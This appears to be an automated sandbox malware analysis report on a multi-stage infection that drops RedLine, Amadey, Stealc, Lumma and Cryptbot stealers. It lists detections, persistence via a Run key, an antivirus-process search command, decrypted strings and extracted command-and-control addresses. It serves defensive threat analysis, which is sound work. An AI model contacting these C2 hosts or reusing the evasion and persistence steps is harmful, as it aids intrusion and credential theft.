10.2.gold.exe.41f5570.0.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
19.0.Nework.exe.610000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
20.0.Hkbsse.exe.220000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
18.0.u3uP67496d.exe.9b0000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
38.2.RegAsm.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.file.exe.870000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
9.2.axplong.exe.210000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
12.2.RegAsm.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
16.2.RegAsm.exe.400000.1.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
23.2.needmoney.exe.312a4b9.0.raw.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
19.2.Nework.exe.610000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
23.2.needmoney.exe.3740000.2.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
3.2.axplong.exe.210000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
16.2.RegAsm.exe.400000.1.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
16.2.RegAsm.exe.436080.0.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
20.2.Hkbsse.exe.220000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
22.2.Hkbsse.exe.220000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
27.2.acentric.exe.284727c.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
2.2.axplong.exe.210000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
29.0.svchost015.exe.400000.0.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
29.0.svchost015.exe.400000.0.unpack	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
Click to see the 29 entries

Sigma Signatures

System Summary

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe, ProcessId: 6560, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\splwow64.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe, ProcessId: 6560, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\splwow64.exe

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: Waters.pif Q, CommandLine: Waters.pif Q, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\607698\Waters.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\607698\Waters.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\607698\Waters.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Emotions Emotions.bat & Emotions.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7316, ParentProcessName: cmd.exe, ProcessCommandLine: Waters.pif Q, ProcessId: 8072, ProcessName: Waters.pif

Sigma detected: SCR File Write Event

Source: File created

Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\607698\Waters.pif, ProcessId: 8072, TargetFilename: C:\Users\user\AppData\Local\QuantumDynamics Lab\QuantumFlow.scr

Sigma detected: Suspicious Screensaver Binary File Creation

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\607698\Waters.pif, ProcessId: 8072, TargetFilename: C:\Users\user\AppData\Local\QuantumDynamics Lab\QuantumFlow.scr

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Search for Antivirus process

Source: Process started

Author: Joe Security: Data: Command: findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine: findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Emotions Emotions.bat & Emotions.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7316, ParentProcessName: cmd.exe, ProcessCommandLine: findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth" , ProcessId: 5360, ProcessName: findstr.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\acentric[1].exe	Avira: detection malicious, Label: TR/Spy.Agent.bvpeh
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\Blenar[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1312961
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\crypted[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1357677
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\2[1].exe	Avira: detection malicious, Label: TR/Drop.Agent.fgswh
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\stealc_default2[1].exe	Avira: detection malicious, Label: TR/AD.Stealc.pegov
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\rstxdhuj[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1358803

Found malware configuration

Source: 00000003.00000002.1448950419.0000000000211000.00000040.00000001.01000000.00000007.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.16/Jo89Ku7d/index.php", "Version": "4.41", "Install Folder": "44111dbc49", "Install File": "axplong.exe"}
Source: 00000024.00000002.2377213784.0000000003B95000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: RedLine {"C2 url": "89.105.223.196:29862", "Bot Id": "ERROR RDX", "Authorization Header": "21d3b2e8d7fdeff423c7a5819c5e64ed"}
Source: 00000020.00000002.3818833176.00000000029C2000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: Zhark RAT {"C2 url": "https://solutionhub.cc:443/socket/", "Id": "5A90D63E0E4DDF045D88A0B893E4499EB6814BDA077145A36EC98B433E2DBDA1", "Version": "1CC68878051DC553418AD7"}
Source: 00000017.00000002.2260770680.0000000003710000.00000040.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: StealC {"C2 url": "http://91.202.233.158/e96ea2db21fa9a1b.php", "Botnet": "default"}
Source: 00000017.00000002.2260770680.0000000003710000.00000040.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Vidar {"C2 url": "http://91.202.233.158/e96ea2db21fa9a1b.php", "Botnet": "default"}
Source: 16.2.RegAsm.exe.400000.1.unpack	Malware Configuration Extractor: LummaC {"C2 url": ["gutterydhowi.shop", "stogeneratmns.shop", "drawzhotdog.shop", "ghostreedmnu.shop", "reinforcenh.shop", "vozmeatillu.shop", "lootebarrkeyn.shop", "offensivedzvju.shop", "fragnantbui.shop"], "Build id": "FATE99--Mix"}
Source: JavvvUmar.exe.7192.28.memstrmin	Malware Configuration Extractor: Cryptbot {"C2 list": ["sevtvf17vt.top", "analforeverlovyu.top", "vt.top", ".top", "@sevtvf17vt.top"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\2[1].exe	ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\Nework[1].exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\acentric[1].exe	ReversingLabs: Detection: 71%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\rstxdhuj[1].exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\splwow64[1].exe	ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\2[1].exe	ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\crypted[1].exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\newbundle2[1].exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\stealc_default2[1].exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\12dsvc[1].exe	ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\66ed86be077bb_12[1].exe	ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\Blenar[1].exe	ReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\JavvvUmar[1].exe	ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\penis[1].exe	ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\LummaC222222[1].exe	ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\gold[1].exe	ReversingLabs: Detection: 100%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\needmoney[1].exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	ReversingLabs: Detection: 100%
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\1000064001\JavvvUmar.exe	ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	ReversingLabs: Detection: 71%
Source: C:\Users\user\AppData\Local\Temp\1000285001\2.exe	ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exe	ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe	ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\Temp\1000318001\66ed86be077bb_12.exe	ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\1000321001\2.exe	ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\1000340001\Blenar.exe	ReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\wZcULqdrBkDQvQgfGRYD.dll	ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Roaming\d3d9.dll	ReversingLabs: Detection: 61%

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 55%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\66ed86be077bb_12[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\splwow64[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\Nework[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\2[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\stealc_default2[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\rstxdhuj[1].exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 16.2.RegAsm.exe.400000.1.unpack	String decryptor: reinforcenh.shop
Source: 16.2.RegAsm.exe.400000.1.unpack	String decryptor: stogeneratmns.shop
Source: 16.2.RegAsm.exe.400000.1.unpack	String decryptor: fragnantbui.shop
Source: 16.2.RegAsm.exe.400000.1.unpack	String decryptor: drawzhotdog.shop
Source: 16.2.RegAsm.exe.400000.1.unpack	String decryptor: vozmeatillu.shop
Source: 16.2.RegAsm.exe.400000.1.unpack	String decryptor: offensivedzvju.shop
Source: 16.2.RegAsm.exe.400000.1.unpack	String decryptor: ghostreedmnu.shop
Source: 16.2.RegAsm.exe.400000.1.unpack	String decryptor: gutterydhowi.shop
Source: 16.2.RegAsm.exe.400000.1.unpack	String decryptor: lootebarrkeyn.shop
Source: 16.2.RegAsm.exe.400000.1.unpack	String decryptor: lid=%s&j=%s&ver=4.0
Source: 16.2.RegAsm.exe.400000.1.unpack	String decryptor: TeslaBrowser/5.5
Source: 16.2.RegAsm.exe.400000.1.unpack	String decryptor: - Screen Resoluton:
Source: 16.2.RegAsm.exe.400000.1.unpack	String decryptor: - Physical Installed Memory:
Source: 16.2.RegAsm.exe.400000.1.unpack	String decryptor: Workgroup: -
Source: 16.2.RegAsm.exe.400000.1.unpack	String decryptor: FATE99--Mix

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source:	Binary string: mozglue.pdbP source: stealc_default2.exe, 00000015.00000002.2385338281.0000000069AED000.00000002.00000001.01000000.00000020.sdmp, svchost015.exe, 0000001D.00000002.2953116563.000000006A5ED000.00000002.00000001.01000000.00000020.sdmp
Source:	Binary string: .pdb8 source: axplong.exe, 00000009.00000003.2664280085.0000000000E3B000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000009.00000002.3830428963.0000000000E3B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb@ source: stealc_default2.exe, 00000015.00000002.2386540936.000000006A6BF000.00000002.00000001.01000000.0000001F.sdmp, svchost015.exe, 0000001D.00000002.2943418582.000000006939F000.00000002.00000001.01000000.0000001F.sdmp
Source:	Binary string: F:\OptimalSnake\Notepad\obj\Release\OpticAbyssmal.pdbLk source: acentric.exe, 0000001B.00000000.2214224431.0000000000412000.00000002.00000001.01000000.00000019.sdmp
Source:	Binary string: nss3.pdb source: stealc_default2.exe, 00000015.00000002.2386540936.000000006A6BF000.00000002.00000001.01000000.0000001F.sdmp, svchost015.exe, 0000001D.00000002.2943418582.000000006939F000.00000002.00000001.01000000.0000001F.sdmp
Source:	Binary string: mozglue.pdb source: stealc_default2.exe, 00000015.00000002.2385338281.0000000069AED000.00000002.00000001.01000000.00000020.sdmp, svchost015.exe, 0000001D.00000002.2953116563.000000006A5ED000.00000002.00000001.01000000.00000020.sdmp
Source:	Binary string: F:\OptimalSnake\Notepad\obj\Release\OpticAbyssmal.pdb source: acentric.exe, 0000001B.00000000.2214224431.0000000000412000.00000002.00000001.01000000.00000019.sdmp

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 16_2_0041B6EA FindFirstFileExW,

16_2_0041B6EA

Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	File opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	File opened: C:\Users\user

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 06878BCAh	12_2_06878799
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 0687904Ah	12_2_06878799
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 0687B397h	12_2_0687AC28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then inc dword ptr [ebp-20h]	12_2_06872E88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 089D4A45h	12_2_089D4A24
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 089D571Dh	12_2_089D5350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 089D571Dh	12_2_089D5341
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 089D7DC7h	12_2_089D7DAF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 089D8F9Bh	12_2_089D8D68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	12_2_089D9638
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then mov eax, dword ptr [esp]	17_2_0018D2C0
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then jmp eax	17_2_001C7600
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then mov word ptr [eax], cx	17_2_001CA7E0
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	17_2_001CAC00
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then push ebx	17_2_00195078
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then mov byte ptr [ebx], al	17_2_001B40F5
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then mov byte ptr [ebx], al	17_2_001B40F5
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh	17_2_001C50E0
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then movzx edi, byte ptr [eax+esi]	17_2_00187120
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then mov word ptr [eax], cx	17_2_001AA274
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then mov word ptr [edx], ax	17_2_001AA274
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	17_2_001C2280
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then mov word ptr [eax], cx	17_2_001AA2F9
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then mov word ptr [edx], ax	17_2_001AA2F9
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then mov word ptr [eax], cx	17_2_001AA345
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then mov word ptr [edx], ax	17_2_001AA345
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then mov eax, dword ptr [esp]	17_2_001AA345
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	17_2_001B1370
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], CECD21FDh	17_2_001AC390
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh	17_2_001AC390
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 0633C81Dh	17_2_001C9390
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then mov eax, dword ptr [esp]	17_2_001C9390
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then mov ebx, eax	17_2_0018A3C0
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then mov ebp, eax	17_2_0018A3C0
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then mov eax, dword ptr [esp]	17_2_001A4490
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	17_2_001A04A0
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then mov word ptr [eax], dx	17_2_001A04A0
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	17_2_001BB510
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then mov eax, dword ptr [esi+000006A8h]	17_2_0019E52C
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then mov ecx, esi	17_2_001AD56C
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then mov ecx, esi	17_2_001AD58E
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then mov eax, dword ptr [esp]	17_2_001AF5B7
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then mov eax, dword ptr [esi]	17_2_001946B5
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then mov byte ptr [ebx], al	17_2_001B27B0
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then mov eax, dword ptr [esi+20h]	17_2_001B27B0
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then mov byte ptr [ebx], al	17_2_001B27B0
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then mov byte ptr [ebx], al	17_2_001B27B0
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then mov byte ptr [ebx], al	17_2_001B27B0
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then mov byte ptr [ebx], al	17_2_001B27B0
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then mov byte ptr [edi], al	17_2_001B27B0
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then mov byte ptr [edi], al	17_2_001B27B0
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then mov byte ptr [ebx], al	17_2_001B27B0
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then mov byte ptr [edx], cl	17_2_001B27B0
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then movzx edx, byte ptr [ecx+eax]	17_2_0018F7E0
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then cmp al, 2Eh	17_2_001AC891
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then xor eax, eax	17_2_001AC891
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	17_2_0019A880
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh	17_2_001C4970
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 54CA534Eh	17_2_001C89F0
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then mov byte ptr [edi], al	17_2_001B4A2F
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 0633C81Dh	17_2_001C5AD0
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then mov eax, dword ptr [esi]	17_2_00193AE6
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then mov ebx, ecx	17_2_00193AE6
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then cmp byte ptr [edi], 00000000h	17_2_00193AE6
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then jmp edx	17_2_001A7B0F
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then mov eax, dword ptr [esp+0Ch]	17_2_001ABB00
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	17_2_001B0BD0
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then movzx ecx, word ptr [edi+eax]	17_2_001C8BE0
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	17_2_00184C10
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	17_2_001A6CA0
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ebx]	17_2_00185D20
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then add edi, 02h	17_2_0019DD64
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then mov eax, dword ptr [ebx]	17_2_0019DD64
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	17_2_001CAD90
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then mov eax, dword ptr [esp+0Ch]	17_2_001C5D80
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then mov byte ptr [edi], al	17_2_001B4DF6
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then cmp byte ptr [ebx], 00000000h	17_2_00194E26
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then xor eax, eax	17_2_00194E26
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then mov eax, dword ptr [esp]	17_2_001C9E60
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then mov eax, dword ptr [esi+1Ch]	17_2_0018FEBC
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	17_2_001C7EDE
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then mov eax, dword ptr [esp]	17_2_001CAF10
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah	17_2_001CAF10
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Code function: 4x nop then mov word ptr [eax], cx	17_2_001A6F20
